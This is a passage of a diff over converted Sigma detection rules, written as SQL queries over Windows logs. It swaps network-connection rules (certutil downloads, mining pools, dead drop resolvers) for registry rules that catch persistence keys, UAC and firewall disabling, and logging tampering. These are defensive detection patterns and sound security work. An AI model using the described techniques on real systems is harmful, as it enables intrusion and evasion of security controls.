LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "status": "experimental", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Legitimate msiexec over networks" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_msiexec.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Suspicious Dropbox API Usage", - "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", "status": "experimental", - "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], "falsepositives": [ - "Legitimate use of the API with a tool that the author wasn't aware of" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND NewProcessName LIKE '%python%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" - ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" - }, - { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.impact", - "attack.t1496" - ], - "falsepositives": [ - "Legitimate use of crypto miners" - ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.t1112" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.lateral_movement" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (NewValue LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\edge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 